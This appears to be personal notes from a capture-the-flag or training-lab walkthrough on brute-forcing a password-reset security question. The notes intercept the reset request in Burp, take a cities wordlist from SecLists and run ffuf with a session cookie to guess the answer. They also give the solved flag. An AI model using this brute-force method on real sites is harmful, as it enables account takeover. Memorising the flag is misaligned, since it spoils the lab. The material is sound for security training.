PASSWORD RESET: SECURITY QUESTIONS
#identify valid webapp users
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
username: admin
password: invalid
* username=admin&password=invalid
* error: "Invalid username or password."
- the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc
#intercept request & response error msg for use with ffuf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Reset your password
username field: admin
* submit the expected user input
#identity session cookie, the target page, and the error msg
BURP > Proxy
Request
...
POST /security_question.php HTTP/1.1
Host: 94.237.57.27:54385
Origin: http://94.237.57.27:54385
Content-Type: application/x-www-form-urlencoded
Referer: http://94.237.57.27:54385/security_question.php
Cookie: PHPSESSID=e442r8fnnre805ctkfl9d0cm0e
Connection: close
security_response=test
* Incorrect response.
* the PHPSESSID cookie is required
#generate security question wordlist
root@oco:~$ locate *citi*
/usr/share/seclists/Miscellaneous/security-question-answers/cities.txt
/usr/share/seclists/Miscellaneous/us-cities.txt
root@oco:~$ cp /usr/share/seclists/Miscellaneous/security-question-answers/cities.txt .
root@oco:~$ cat cities.txt
root@oco:~$ wc -l cities.txt
#craft the ffuf cmds
root@oco:~$ ffuf -w cities.txt -u http://94.237.57.27:54385/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=e442r8fnnre805ctkfl9d0cm0e" -d "security_response=FUZZ" -fr "Incorrect response."
* use "manchester" NOT "Manchester" to answer the academy question; however, use "Manchester" to reset the password
#reset the password
root@oco:~$ BROWSER > http://94.237.57.27:54385/index.php
username: admin
password: {arbitrary}
* HTB{d4740b1801d9880ff70de227a54309f0}Last updated